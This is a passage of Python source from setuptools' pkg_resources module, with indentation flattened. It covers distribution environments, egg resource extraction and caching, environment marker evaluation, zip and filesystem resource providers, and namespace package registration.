for callback in self.callbacks:
callback(dist)
def __getstate__(self):
return (
self.entries[:], self.entry_keys.copy(), self.by_key.copy(),
self.callbacks[:]
)
def __setstate__(self, e_k_b_c):
entries, keys, by_key, callbacks = e_k_b_c
self.entries = entries[:]
self.entry_keys = keys.copy()
self.by_key = by_key.copy()
self.callbacks = callbacks[:]
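# Illustrative sketch (not in the original source): building a WorkingSet from
# sys.path, listing what it can see, and activating a requirement.  The
# module-level ``working_set`` and ``require`` helpers defined elsewhere in
# this file wrap the same calls.
def _working_set_example(requirement="setuptools"):
    ws = WorkingSet()
    names = sorted(dist.project_name for dist in ws)
    ws.require(requirement)
    return names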
class Environment(object):
"""Searchable snapshot of distributions on a search path"""
def __init__(self, search_path=None, platform=get_supported_platform(),
python=PY_MAJOR):
"""Snapshot distributions available on a search path
Any distributions found on `search_path` are added to the environment.
`search_path` should be a sequence of ``sys.path`` items. If not
supplied, ``sys.path`` is used.
`platform` is an optional string specifying the name of the platform
that platform-specific distributions must be compatible with. If
unspecified, it defaults to the current platform. `python` is an
optional string naming the desired version of Python (e.g. ``'3.3'``);
it defaults to the current version.
You may explicitly set `platform` (and/or `python`) to ``None`` if you
wish to map *all* distributions, not just those compatible with the
running platform or Python version.
"""
self._distmap = {}
self.platform = platform
self.python = python
self.scan(search_path)
def can_add(self, dist):
"""Is distribution `dist` acceptable for this environment?
The distribution must match the platform and python version
requirements specified when this environment was created, or False
is returned.
"""
return (self.python is None or dist.py_version is None
or dist.py_version==self.python) \
and compatible_platforms(dist.platform, self.platform)
def remove(self, dist):
"""Remove `dist` from the environment"""
self._distmap[dist.key].remove(dist)
def scan(self, search_path=None):
"""Scan `search_path` for distributions usable in this environment
Any distributions found are added to the environment.
`search_path` should be a sequence of ``sys.path`` items. If not
supplied, ``sys.path`` is used. Only distributions conforming to
the platform/python version defined at initialization are added.
"""
if search_path is None:
search_path = sys.path
for item in search_path:
for dist in find_distributions(item):
self.add(dist)
def __getitem__(self, project_name):
"""Return a newest-to-oldest list of distributions for `project_name`
Uses case-insensitive `project_name` comparison, assuming all the
project's distributions use their project's name converted to all
lowercase as their key.
"""
distribution_key = project_name.lower()
return self._distmap.get(distribution_key, [])
def add(self, dist):
"""Add `dist` if we ``can_add()`` it and it has not already been added
"""
if self.can_add(dist) and dist.has_version():
dists = self._distmap.setdefault(dist.key, [])
if dist not in dists:
dists.append(dist)
dists.sort(key=operator.attrgetter('hashcmp'), reverse=True)
def best_match(self, req, working_set, installer=None):
"""Find distribution best matching `req` and usable on `working_set`
This calls the ``find(req)`` method of the `working_set` to see if a
suitable distribution is already active. (This may raise
``VersionConflict`` if an unsuitable version of the project is already
active in the specified `working_set`.) If a suitable distribution
isn't active, this method returns the newest distribution in the
environment that meets the ``Requirement`` in `req`. If no suitable
distribution is found, and `installer` is supplied, then the result of
calling the environment's ``obtain(req, installer)`` method will be
returned.
"""
dist = working_set.find(req)
if dist is not None:
return dist
for dist in self[req.key]:
if dist in req:
return dist
# try to download/install
return self.obtain(req, installer)
def obtain(self, requirement, installer=None):
"""Obtain a distribution matching `requirement` (e.g. via download)
Obtain a distro that matches requirement (e.g. via download). In the
base ``Environment`` class, this routine just returns
``installer(requirement)``, unless `installer` is None, in which case
None is returned instead. This method is a hook that allows subclasses
to attempt other ways of obtaining a distribution before falling back
to the `installer` argument."""
if installer is not None:
return installer(requirement)
def __iter__(self):
"""Yield the unique project names of the available distributions"""
for key in self._distmap.keys():
if self[key]:
yield key
def __iadd__(self, other):
"""In-place addition of a distribution or environment"""
if isinstance(other, Distribution):
self.add(other)
elif isinstance(other, Environment):
for project in other:
for dist in other[project]:
self.add(dist)
else:
raise TypeError("Can't add %r to environment" % (other,))
return self
def __add__(self, other):
"""Add an environment or distribution to an environment"""
new = self.__class__([], platform=None, python=None)
for env in self, other:
new += env
return new
# XXX backward compatibility
AvailableDistributions = Environment
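# Illustrative sketch (not in the original source): snapshotting sys.path and
# asking for every available distribution of one project, newest first.
def _environment_example(project="setuptools"):
    env = Environment()
    return [dist.version for dist in env[project]]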
class ExtractionError(RuntimeError):
"""An error occurred extracting a resource
The following attributes are available from instances of this exception:
manager
The resource manager that raised this exception
cache_path
The base directory for resource extraction
original_error
The exception instance that caused extraction to fail
"""
class ResourceManager:
"""Manage resource extraction and packages"""
extraction_path = None
def __init__(self):
self.cached_files = {}
def resource_exists(self, package_or_requirement, resource_name):
"""Does the named resource exist?"""
return get_provider(package_or_requirement).has_resource(resource_name)
def resource_isdir(self, package_or_requirement, resource_name):
"""Is the named resource an existing directory?"""
return get_provider(package_or_requirement).resource_isdir(
resource_name
)
def resource_filename(self, package_or_requirement, resource_name):
"""Return a true filesystem path for specified resource"""
return get_provider(package_or_requirement).get_resource_filename(
self, resource_name
)
def resource_stream(self, package_or_requirement, resource_name):
"""Return a readable file-like object for specified resource"""
return get_provider(package_or_requirement).get_resource_stream(
self, resource_name
)
def resource_string(self, package_or_requirement, resource_name):
"""Return specified resource as a string"""
return get_provider(package_or_requirement).get_resource_string(
self, resource_name
)
def resource_listdir(self, package_or_requirement, resource_name):
"""List the contents of the named resource directory"""
return get_provider(package_or_requirement).resource_listdir(
resource_name
)
def extraction_error(self):
"""Give an error message for problems extracting file(s)"""
old_exc = sys.exc_info()[1]
cache_path = self.extraction_path or get_default_cache()
err = ExtractionError("""Can't extract file(s) to egg cache
The following error occurred while trying to extract file(s) to the Python egg
cache:
%s
The Python egg cache directory is currently set to:
%s
Perhaps your account does not have write access to this directory? You can
change the cache directory by setting the PYTHON_EGG_CACHE environment
variable to point to an accessible directory.
""" % (old_exc, cache_path)
)
err.manager = self
err.cache_path = cache_path
err.original_error = old_exc
raise err
def get_cache_path(self, archive_name, names=()):
"""Return absolute location in cache for `archive_name` and `names`
The parent directory of the resulting path will be created if it does
not already exist. `archive_name` should be the base filename of the
enclosing egg (which may not be the name of the enclosing zipfile!),
including its ".egg" extension. `names`, if provided, should be a
sequence of path name parts "under" the egg's extraction location.
This method should only be called by resource providers that need to
obtain an extraction location, and only for names they intend to
extract, as it tracks the generated names for possible cleanup later.
"""
extract_path = self.extraction_path or get_default_cache()
target_path = os.path.join(extract_path, archive_name+'-tmp', *names)
try:
_bypass_ensure_directory(target_path)
except:
self.extraction_error()
self._warn_unsafe_extraction_path(extract_path)
self.cached_files[target_path] = 1
return target_path
@staticmethod
def _warn_unsafe_extraction_path(path):
"""
If the default extraction path is overridden and set to an insecure
location, such as /tmp, it opens up an opportunity for an attacker to
replace an extracted file with an unauthorized payload. Warn the user
if a known insecure location is used.
See Distribute #375 for more details.
"""
if os.name == 'nt' and not path.startswith(os.environ['windir']):
# On Windows, permissions are generally restrictive by default
# and temp directories are not writable by other users, so
# bypass the warning.
return
mode = os.stat(path).st_mode
if mode & stat.S_IWOTH or mode & stat.S_IWGRP:
msg = ("%s is writable by group/others and vulnerable to attack "
"when "
"used with get_resource_filename. Consider a more secure "
"location (set with .set_extraction_path or the "
"PYTHON_EGG_CACHE environment variable)." % path)
warnings.warn(msg, UserWarning)
def postprocess(self, tempname, filename):
"""Perform any platform-specific postprocessing of `tempname`
This is where Mac header rewrites should be done; other platforms don't
have anything special they should do.
Resource providers should call this method ONLY after successfully
extracting a compressed resource. They must NOT call it on resources
that are already in the filesystem.
`tempname` is the current (temporary) name of the file, and `filename`
is the name it will be renamed to by the caller after this routine
returns.
"""
if os.name == 'posix':
# Make the resource executable
mode = ((os.stat(tempname).st_mode) | 0o555) & 0o7777
os.chmod(tempname, mode)
def set_extraction_path(self, path):
"""Set the base path where resources will be extracted to, if needed.
If you do not call this routine before any extractions take place, the
path defaults to the return value of ``get_default_cache()``. (Which
is based on the ``PYTHON_EGG_CACHE`` environment variable, with various
platform-specific fallbacks. See that routine's documentation for more
details.)
Resources are extracted to subdirectories of this path based upon
information given by the ``IResourceProvider``. You may set this to a
temporary directory, but then you must call ``cleanup_resources()`` to
delete the extracted files when done. There is no guarantee that
``cleanup_resources()`` will be able to remove all extracted files.
(Note: you may not change the extraction path for a given resource
manager once resources have been extracted, unless you first call
``cleanup_resources()``.)
"""
if self.cached_files:
raise ValueError(
"Can't change extraction path, files already extracted"
)
self.extraction_path = path
def cleanup_resources(self, force=False):
"""
Delete all extracted resource files and directories, returning a list
of the file and directory names that could not be successfully removed.
This function does not have any concurrency protection, so it should
generally only be called when the extraction path is a temporary
directory exclusive to a single process. This method is not
automatically called; you must call it explicitly or register it as an
``atexit`` function if you wish to ensure cleanup of a temporary
directory used for extractions.
"""
# XXX
def get_default_cache():
"""Determine the default cache location
This returns the ``PYTHON_EGG_CACHE`` environment variable, if set.
Otherwise, on Windows, it returns a "Python-Eggs" subdirectory of the
"Application Data" directory. On all other systems, it's "~/.python-eggs".
"""
try:
return os.environ['PYTHON_EGG_CACHE']
except KeyError:
pass
if os.name!='nt':
return os.path.expanduser('~/.python-eggs')
# XXX this may be locale-specific!
app_data = 'Application Data'
app_homes = [
# best option, should be locale-safe
(('APPDATA',), None),
(('USERPROFILE',), app_data),
(('HOMEDRIVE','HOMEPATH'), app_data),
(('HOMEPATH',), app_data),
(('HOME',), None),
# 95/98/ME
(('WINDIR',), app_data),
]
for keys, subdir in app_homes:
dirname = ''
for key in keys:
if key in os.environ:
dirname = os.path.join(dirname, os.environ[key])
else:
break
else:
if subdir:
dirname = os.path.join(dirname, subdir)
return os.path.join(dirname, 'Python-Eggs')
else:
raise RuntimeError(
"Please set the PYTHON_EGG_CACHE enviroment variable"
)
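# Illustrative sketch (not in the original source): the extraction directory
# can be overridden per ResourceManager instance instead of via the
# PYTHON_EGG_CACHE variable; the path below is a made-up placeholder.
def _cache_override_example(path="~/.cache/example-eggs"):
    manager = ResourceManager()
    manager.set_extraction_path(os.path.expanduser(path))
    return manager.extraction_path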
def safe_name(name):
"""Convert an arbitrary string to a standard distribution name
Any runs of non-alphanumeric/. characters are replaced with a single '-'.
"""
return re.sub('[^A-Za-z0-9.]+', '-', name)
def safe_version(version):
"""
Convert an arbitrary string to a standard version string
"""
try:
# normalize the version
return str(packaging.version.Version(version))
except packaging.version.InvalidVersion:
version = version.replace(' ','.')
return re.sub('[^A-Za-z0-9.]+', '-', version)
def safe_extra(extra):
"""Convert an arbitrary string to a standard 'extra' name
Any runs of non-alphanumeric characters are replaced with a single '_',
and the result is always lowercased.
"""
return re.sub('[^A-Za-z0-9.]+', '_', extra).lower()
def to_filename(name):
"""Convert a project or version name to its filename-escaped form
Any '-' characters are currently replaced with '_'.
"""
return name.replace('-','_')
class MarkerEvaluation(object):
values = {
'os_name': lambda: os.name,
'sys_platform': lambda: sys.platform,
'python_full_version': platform.python_version,
'python_version': lambda: platform.python_version()[:3],
'platform_version': platform.version,
'platform_machine': platform.machine,
'python_implementation': platform.python_implementation,
}
@classmethod
def is_invalid_marker(cls, text):
"""
Validate text as a PEP 426 environment marker; return an exception
if invalid or False otherwise.
"""
try:
cls.evaluate_marker(text)
except SyntaxError:
return cls.normalize_exception(sys.exc_info()[1])
return False
@staticmethod
def normalize_exception(exc):
"""
Given a SyntaxError from a marker evaluation, normalize the error
message:
- Remove indications of filename and line number.
- Replace platform-specific error messages with standard error
messages.
"""
subs = {
'unexpected EOF while parsing': 'invalid syntax',
'parenthesis is never closed': 'invalid syntax',
}
exc.filename = None
exc.lineno = None
exc.msg = subs.get(exc.msg, exc.msg)
return exc
@classmethod
def and_test(cls, nodelist):
# MUST NOT short-circuit evaluation, or invalid syntax can be skipped!
items = [
cls.interpret(nodelist[i])
for i in range(1, len(nodelist), 2)
]
return functools.reduce(operator.and_, items)
@classmethod
def test(cls, nodelist):
# MUST NOT short-circuit evaluation, or invalid syntax can be skipped!
items = [
cls.interpret(nodelist[i])
for i in range(1, len(nodelist), 2)
]
return functools.reduce(operator.or_, items)
@classmethod
def atom(cls, nodelist):
t = nodelist[1][0]
if t == token.LPAR:
if nodelist[2][0] == token.RPAR:
raise SyntaxError("Empty parentheses")
return cls.interpret(nodelist[2])
msg = "Language feature not supported in environment markers"
raise SyntaxError(msg)
@classmethod
def comparison(cls, nodelist):
if len(nodelist) > 4:
msg = "Chained comparison not allowed in environment markers"
raise SyntaxError(msg)
comp = nodelist[2][1]
cop = comp[1]
if comp[0] == token.NAME:
if len(nodelist[2]) == 3:
if cop == 'not':
cop = 'not in'
else:
cop = 'is not'
try:
cop = cls.get_op(cop)
except KeyError:
msg = repr(cop) + " operator not allowed in environment markers"
raise SyntaxError(msg)
return cop(cls.evaluate(nodelist[1]), cls.evaluate(nodelist[3]))
@classmethod
def get_op(cls, op):
ops = {
symbol.test: cls.test,
symbol.and_test: cls.and_test,
symbol.atom: cls.atom,
symbol.comparison: cls.comparison,
'not in': lambda x, y: x not in y,
'in': lambda x, y: x in y,
'==': operator.eq,
'!=': operator.ne,
}
if hasattr(symbol, 'or_test'):
ops[symbol.or_test] = cls.test
return ops[op]
@classmethod
def evaluate_marker(cls, text, extra=None):
"""
Evaluate a PEP 426 environment marker on CPython 2.4+.
Return a boolean indicating the marker result in this environment.
Raise SyntaxError if marker is invalid.
        This implementation uses the 'parser' module, which is not implemented
        on Jython and has been superseded by the 'ast' module in Python 2.6
        and later.
"""
return cls.interpret(parser.expr(text).totuple(1)[1])
@classmethod
def _markerlib_evaluate(cls, text):
"""
Evaluate a PEP 426 environment marker using markerlib.
Return a boolean indicating the marker result in this environment.
Raise SyntaxError if marker is invalid.
"""
import _markerlib
# markerlib implements Metadata 1.2 (PEP 345) environment markers.
# Translate the variables to Metadata 2.0 (PEP 426).
env = _markerlib.default_environment()
for key in env.keys():
new_key = key.replace('.', '_')
env[new_key] = env.pop(key)
try:
result = _markerlib.interpret(text, env)
except NameError:
e = sys.exc_info()[1]
raise SyntaxError(e.args[0])
return result
if 'parser' not in globals():
# Fall back to less-complete _markerlib implementation if 'parser' module
# is not available.
evaluate_marker = _markerlib_evaluate
@classmethod
def interpret(cls, nodelist):
while len(nodelist)==2: nodelist = nodelist[1]
try:
op = cls.get_op(nodelist[0])
except KeyError:
raise SyntaxError("Comparison or logical expression expected")
return op(nodelist)
@classmethod
def evaluate(cls, nodelist):
while len(nodelist)==2: nodelist = nodelist[1]
kind = nodelist[0]
name = nodelist[1]
if kind==token.NAME:
try:
op = cls.values[name]
except KeyError:
raise SyntaxError("Unknown name %r" % name)
return op()
if kind==token.STRING:
s = nodelist[1]
if not cls._safe_string(s):
raise SyntaxError(
"Only plain strings allowed in environment markers")
return s[1:-1]
msg = "Language feature not supported in environment markers"
raise SyntaxError(msg)
@staticmethod
def _safe_string(cand):
return (
cand[:1] in "'\"" and
not cand.startswith('"""') and
not cand.startswith("'''") and
'\\' not in cand
)
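# Only simple single- or double-quoted literals are accepted: triple-quoted
# strings and backslash escapes are rejected to keep markers trivially safe.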
invalid_marker = MarkerEvaluation.is_invalid_marker
evaluate_marker = MarkerEvaluation.evaluate_marker
class NullProvider:
"""Try to implement resources and metadata for arbitrary PEP 302 loaders"""
egg_name = None
egg_info = None
loader = None
def __init__(self, module):
self.loader = getattr(module, '__loader__', None)
self.module_path = os.path.dirname(getattr(module, '__file__', ''))
def get_resource_filename(self, manager, resource_name):
return self._fn(self.module_path, resource_name)
def get_resource_stream(self, manager, resource_name):
return io.BytesIO(self.get_resource_string(manager, resource_name))
def get_resource_string(self, manager, resource_name):
return self._get(self._fn(self.module_path, resource_name))
def has_resource(self, resource_name):
return self._has(self._fn(self.module_path, resource_name))
def has_metadata(self, name):
return self.egg_info and self._has(self._fn(self.egg_info, name))
if sys.version_info <= (3,):
def get_metadata(self, name):
if not self.egg_info:
return ""
return self._get(self._fn(self.egg_info, name))
else:
def get_metadata(self, name):
if not self.egg_info:
return ""
return self._get(self._fn(self.egg_info, name)).decode("utf-8")
def get_metadata_lines(self, name):
return yield_lines(self.get_metadata(name))
def resource_isdir(self, resource_name):
return self._isdir(self._fn(self.module_path, resource_name))
def metadata_isdir(self, name):
return self.egg_info and self._isdir(self._fn(self.egg_info, name))
def resource_listdir(self, resource_name):
return self._listdir(self._fn(self.module_path, resource_name))
def metadata_listdir(self, name):
if self.egg_info:
return self._listdir(self._fn(self.egg_info, name))
return []
def run_script(self, script_name, namespace):
script = 'scripts/'+script_name
if not self.has_metadata(script):
raise ResolutionError("No script named %r" % script_name)
script_text = self.get_metadata(script).replace('\r\n', '\n')
script_text = script_text.replace('\r', '\n')
script_filename = self._fn(self.egg_info, script)
namespace['__file__'] = script_filename
if os.path.exists(script_filename):
source = open(script_filename).read()
code = compile(source, script_filename, 'exec')
exec(code, namespace, namespace)
else:
from linecache import cache
cache[script_filename] = (
len(script_text), 0, script_text.split('\n'), script_filename
)
script_code = compile(script_text, script_filename,'exec')
exec(script_code, namespace, namespace)
def _has(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _isdir(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _listdir(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _fn(self, base, resource_name):
if resource_name:
return os.path.join(base, *resource_name.split('/'))
return base
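# Resource names always use '/' as the separator; _fn() converts them to
# native paths relative to the given base directory.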
def _get(self, path):
if hasattr(self.loader, 'get_data'):
return self.loader.get_data(path)
raise NotImplementedError(
"Can't perform this operation for loaders without 'get_data()'"
)
register_loader_type(object, NullProvider)
class EggProvider(NullProvider):
"""Provider based on a virtual filesystem"""
def __init__(self, module):
NullProvider.__init__(self, module)
self._setup_prefix()
def _setup_prefix(self):
# we assume here that our metadata may be nested inside a "basket"
# of multiple eggs; that's why we use module_path instead of .archive
path = self.module_path
old = None
while path!=old:
if path.lower().endswith('.egg'):
self.egg_name = os.path.basename(path)
self.egg_info = os.path.join(path, 'EGG-INFO')
self.egg_root = path
break
old = path
path, base = os.path.split(path)
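# The walk stops at the first ancestor ending in '.egg', which becomes
# egg_root; metadata is then read from its EGG-INFO subdirectory.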
class DefaultProvider(EggProvider):
"""Provides access to package resources in the filesystem"""
def _has(self, path):
return os.path.exists(path)
def _isdir(self, path):
return os.path.isdir(path)
def _listdir(self, path):
return os.listdir(path)
def get_resource_stream(self, manager, resource_name):
return open(self._fn(self.module_path, resource_name), 'rb')
def _get(self, path):
with open(path, 'rb') as stream:
return stream.read()
register_loader_type(type(None), DefaultProvider)
if importlib_bootstrap is not None:
register_loader_type(importlib_bootstrap.SourceFileLoader, DefaultProvider)
class EmptyProvider(NullProvider):
"""Provider that returns nothing for all requests"""
_isdir = _has = lambda self, path: False
_get = lambda self, path: ''
_listdir = lambda self, path: []
module_path = None
def __init__(self):
pass
empty_provider = EmptyProvider()
class ZipManifests(dict):
"""
zip manifest builder
"""
@classmethod
def build(cls, path):
"""
Build a dictionary similar to the zipimport directory
caches, except instead of tuples, store ZipInfo objects.
Use a platform-specific path separator (os.sep) for the path keys
for compatibility with pypy on Windows.
"""
with ContextualZipFile(path) as zfile:
items = (
(
name.replace('/', os.sep),
zfile.getinfo(name),
)
for name in zfile.namelist()
)
return dict(items)
load = build
class MemoizedZipManifests(ZipManifests):
"""
Memoized zipfile manifests.
"""
manifest_mod = collections.namedtuple('manifest_mod', 'manifest mtime')
def load(self, path):
"""
Load a manifest at path or return a suitable manifest already loaded.
"""
path = os.path.normpath(path)
mtime = os.stat(path).st_mtime
if path not in self or self[path].mtime != mtime:
manifest = self.build(path)
self[path] = self.manifest_mod(manifest, mtime)
return self[path].manifest
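# Manifests are re-read only when the archive's mtime changes, so repeated
# lookups against the same zip file stay cheap.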
class ContextualZipFile(zipfile.ZipFile):
"""
Supplement ZipFile class to support context manager for Python 2.6
"""
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def __new__(cls, *args, **kwargs):
"""
Construct a ZipFile or ContextualZipFile as appropriate
"""
if hasattr(zipfile.ZipFile, '__exit__'):
return zipfile.ZipFile(*args, **kwargs)
return super(ContextualZipFile, cls).__new__(cls)
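# On interpreters where zipfile.ZipFile already implements the context
# manager protocol, a plain ZipFile is returned and this shim is bypassed.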
class ZipProvider(EggProvider):
"""Resource support for zips and eggs"""
eagers = None
_zip_manifests = MemoizedZipManifests()
def __init__(self, module):
EggProvider.__init__(self, module)
self.zip_pre = self.loader.archive+os.sep
def _zipinfo_name(self, fspath):
# Convert a virtual filename (full path to file) into a zipfile subpath
# usable with the zipimport directory cache for our target archive
if fspath.startswith(self.zip_pre):
return fspath[len(self.zip_pre):]
raise AssertionError(
"%s is not a subpath of %s" % (fspath, self.zip_pre)
)
def _parts(self, zip_path):
# Convert a zipfile subpath into an egg-relative path part list.
# pseudo-fs path
fspath = self.zip_pre+zip_path
if fspath.startswith(self.egg_root+os.sep):
return fspath[len(self.egg_root)+1:].split(os.sep)
raise AssertionError(
"%s is not a subpath of %s" % (fspath, self.egg_root)
)
@property
def zipinfo(self):
return self._zip_manifests.load(self.loader.archive)
def get_resource_filename(self, manager, resource_name):
if not self.egg_name:
raise NotImplementedError(
"resource_filename() only supported for .egg, not .zip"
)
# no need to lock for extraction, since we use temp names
zip_path = self._resource_to_zip(resource_name)
eagers = self._get_eager_resources()
if '/'.join(self._parts(zip_path)) in eagers:
for name in eagers:
self._extract_resource(manager, self._eager_to_zip(name))
return self._extract_resource(manager, zip_path)
@staticmethod
def _get_date_and_size(zip_stat):
size = zip_stat.file_size
# ymdhms+wday, yday, dst
date_time = zip_stat.date_time + (0, 0, -1)
# 1980 offset already done
timestamp = time.mktime(date_time)
return timestamp, size
def _extract_resource(self, manager, zip_path):
if zip_path in self._index():
for name in self._index()[zip_path]:
last = self._extract_resource(
manager, os.path.join(zip_path, name)
)
# return the extracted directory name
return os.path.dirname(last)
timestamp, size = self._get_date_and_size(self.zipinfo[zip_path])
if not WRITE_SUPPORT:
raise IOError('"os.rename" and "os.unlink" are not supported '
'on this platform')
try:
real_path = manager.get_cache_path(
self.egg_name, self._parts(zip_path)
)
if self._is_current(real_path, zip_path):
return real_path
outf, tmpnam = _mkstemp(".$extract", dir=os.path.dirname(real_path))
os.write(outf, self.loader.get_data(zip_path))
os.close(outf)
utime(tmpnam, (timestamp, timestamp))
manager.postprocess(tmpnam, real_path)
try:
rename(tmpnam, real_path)
except os.error:
if os.path.isfile(real_path):
if self._is_current(real_path, zip_path):
# the file became current since it was checked above,
# so proceed.
return real_path
# Windows, del old file and retry
elif os.name=='nt':
unlink(real_path)
rename(tmpnam, real_path)
return real_path
raise
except os.error:
# report a user-friendly error
manager.extraction_error()
return real_path
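# Extraction writes to a uniquely named temp file and renames it into place,
# so concurrent extractions either observe a finished file or retry safely.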
def _is_current(self, file_path, zip_path):
"""
Return True if the file_path is current for this zip_path
"""
timestamp, size = self._get_date_and_size(self.zipinfo[zip_path])
if not os.path.isfile(file_path):
return False
stat = os.stat(file_path)
if stat.st_size!=size or stat.st_mtime!=timestamp:
return False
# check that the contents match
zip_contents = self.loader.get_data(zip_path)
with open(file_path, 'rb') as f:
file_contents = f.read()
return zip_contents == file_contents
def _get_eager_resources(self):
if self.eagers is None:
eagers = []
for name in ('native_libs.txt', 'eager_resources.txt'):
if self.has_metadata(name):
eagers.extend(self.get_metadata_lines(name))
self.eagers = eagers
return self.eagers
def _index(self):
try:
return self._dirindex
except AttributeError:
ind = {}
for path in self.zipinfo:
parts = path.split(os.sep)
while parts:
parent = os.sep.join(parts[:-1])
if parent in ind:
ind[parent].append(parts[-1])
break
else:
ind[parent] = [parts.pop()]
self._dirindex = ind
return ind
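# The index maps each directory subpath inside the archive to the entry
# names it contains, letting _isdir()/_listdir() avoid any filesystem I/O.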
def _has(self, fspath):
zip_path = self._zipinfo_name(fspath)
return zip_path in self.zipinfo or zip_path in self._index()
def _isdir(self, fspath):
return self._zipinfo_name(fspath) in self._index()
def _listdir(self, fspath):
return list(self._index().get(self._zipinfo_name(fspath), ()))
def _eager_to_zip(self, resource_name):
return self._zipinfo_name(self._fn(self.egg_root, resource_name))
def _resource_to_zip(self, resource_name):
return self._zipinfo_name(self._fn(self.module_path, resource_name))
register_loader_type(zipimport.zipimporter, ZipProvider)
class FileMetadata(EmptyProvider):
"""Metadata handler for standalone PKG-INFO files
Usage::
metadata = FileMetadata("/path/to/PKG-INFO")
This provider rejects all data and metadata requests except for PKG-INFO,
which is treated as existing, and will be the contents of the file at
the provided location.
"""
def __init__(self, path):
self.path = path
def has_metadata(self, name):
return name=='PKG-INFO'
def get_metadata(self, name):
if name=='PKG-INFO':
with open(self.path,'rU') as f:
metadata = f.read()
return metadata
raise KeyError("No metadata except PKG-INFO is available")
def get_metadata_lines(self, name):
return yield_lines(self.get_metadata(name))
class PathMetadata(DefaultProvider):
"""Metadata provider for egg directories
Usage::
# Development eggs:
egg_info = "/path/to/PackageName.egg-info"
base_dir = os.path.dirname(egg_info)
metadata = PathMetadata(base_dir, egg_info)
dist_name = os.path.splitext(os.path.basename(egg_info))[0]
dist = Distribution(base_dir, project_name=dist_name, metadata=metadata)
# Unpacked egg directories:
egg_path = "/path/to/PackageName-ver-pyver-etc.egg"
metadata = PathMetadata(egg_path, os.path.join(egg_path,'EGG-INFO'))
dist = Distribution.from_filename(egg_path, metadata=metadata)
"""
def __init__(self, path, egg_info):
self.module_path = path
self.egg_info = egg_info
class EggMetadata(ZipProvider):
"""Metadata provider for .egg files"""
def __init__(self, importer):
"""Create a metadata provider from a zipimporter"""
self.zip_pre = importer.archive+os.sep
self.loader = importer
if importer.prefix:
self.module_path = os.path.join(importer.archive, importer.prefix)
else:
self.module_path = importer.archive
self._setup_prefix()
_declare_state('dict', _distribution_finders = {})
def register_finder(importer_type, distribution_finder):
"""Register `distribution_finder` to find distributions in sys.path items
`importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
handler), and `distribution_finder` is a callable that, passed a path
item and the importer instance, yields ``Distribution`` instances found on
that path item. See ``pkg_resources.find_on_path`` for an example."""
_distribution_finders[importer_type] = distribution_finder
def find_distributions(path_item, only=False):
"""Yield distributions accessible via `path_item`"""
importer = get_importer(path_item)
finder = _find_adapter(_distribution_finders, importer)
return finder(importer, path_item, only)
def find_eggs_in_zip(importer, path_item, only=False):
"""
Find eggs in zip files; possibly multiple nested eggs.
"""
if importer.archive.endswith('.whl'):
# wheels are not supported with this finder
# they don't have PKG-INFO metadata, and won't ever contain eggs
return
metadata = EggMetadata(importer)
if metadata.has_metadata('PKG-INFO'):
yield Distribution.from_filename(path_item, metadata=metadata)
if only:
# don't yield nested distros
return
for subitem in metadata.resource_listdir('/'):
if subitem.endswith('.egg'):
subpath = os.path.join(path_item, subitem)
for dist in find_eggs_in_zip(zipimport.zipimporter(subpath), subpath):
yield dist
register_finder(zipimport.zipimporter, find_eggs_in_zip)
def find_nothing(importer, path_item, only=False):
return ()
register_finder(object, find_nothing)
def find_on_path(importer, path_item, only=False):
"""Yield distributions accessible on a sys.path directory"""
path_item = _normalize_cached(path_item)
if os.path.isdir(path_item) and os.access(path_item, os.R_OK):
if path_item.lower().endswith('.egg'):
# unpacked egg
yield Distribution.from_filename(
path_item, metadata=PathMetadata(
path_item, os.path.join(path_item,'EGG-INFO')
)
)
else:
# scan for .egg and .egg-info in directory
for entry in os.listdir(path_item):
lower = entry.lower()
if lower.endswith('.egg-info') or lower.endswith('.dist-info'):
fullpath = os.path.join(path_item, entry)
if os.path.isdir(fullpath):
# egg-info directory, allow getting metadata
metadata = PathMetadata(path_item, fullpath)
else:
metadata = FileMetadata(fullpath)
yield Distribution.from_location(
path_item, entry, metadata, precedence=DEVELOP_DIST
)
elif not only and lower.endswith('.egg'):
dists = find_distributions(os.path.join(path_item, entry))
for dist in dists:
yield dist
elif not only and lower.endswith('.egg-link'):
with open(os.path.join(path_item, entry)) as entry_file:
entry_lines = entry_file.readlines()
for line in entry_lines:
if not line.strip():
continue
path = os.path.join(path_item, line.rstrip())
dists = find_distributions(path)
for item in dists:
yield item
break
register_finder(pkgutil.ImpImporter, find_on_path)
if importlib_bootstrap is not None:
register_finder(importlib_bootstrap.FileFinder, find_on_path)
_declare_state('dict', _namespace_handlers={})
_declare_state('dict', _namespace_packages={})
def register_namespace_handler(importer_type, namespace_handler):
"""Register `namespace_handler` to declare namespace packages
`importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
handler), and `namespace_handler` is a callable like this::
def namespace_handler(importer, path_entry, moduleName, module):
# return a path_entry to use for child packages
Namespace handlers are only called if the importer object has already
agreed that it can handle the relevant path item, and they should only
return a subpath if the module __path__ does not already contain an
equivalent subpath. For an example namespace handler, see
``pkg_resources.file_ns_handler``.
"""
_namespace_handlers[importer_type] = namespace_handler
def _handle_ns(packageName, path_item):
"""Ensure that named package includes a subpath of path_item (if needed)"""
importer = get_importer(path_item)
if importer is None:
return None
loader = importer.find_module(packageName)
if loader is None:
return None
module = sys.modules.get(packageName)
if module is None:
module = sys.modules[packageName] = imp.new_module(packageName)
module.__path__ = []
_set_parent_ns(packageName)
elif not hasattr(module,'__path__'):
raise TypeError("Not a package:", packageName)
handler = _find_adapter(_namespace_handlers, importer)
subpath = handler(importer, path_item, packageName, module)
if subpath is not None:
path = module.__path__
path.append(subpath)
loader.load_module(packageName)
for path_item in path:
if path_item not in module.__path__:
module.__path__.append(path_item)
return subpath
def declare_namespace(packageName):
"""Declare that package 'packageName' is a namespace package"""
imp.acquire_lock()
try:
if packageName in _namespace_packages:
return
path, parent = sys.path, None
if '.' in packageName:
parent = '.'.join(packageName.split('.')[:-1])
declare_namespace(parent)
if parent not in _namespace_packages:
__import__(parent)
try:
path = sys.modules[parent].__path__
except AttributeError:
raise TypeError("Not a package:", parent)
# Track what packages are namespaces, so when new path items are added,
# they can be updated
_namespace_packages.setdefault(parent,[]).append(packageName)
_namespace_packages.setdefault(packageName,[])
for path_item in path:
# Ensure all the parent's path items are reflected in the child,
# if they apply
_handle_ns(packageName, path_item)
finally:
imp.release_lock()
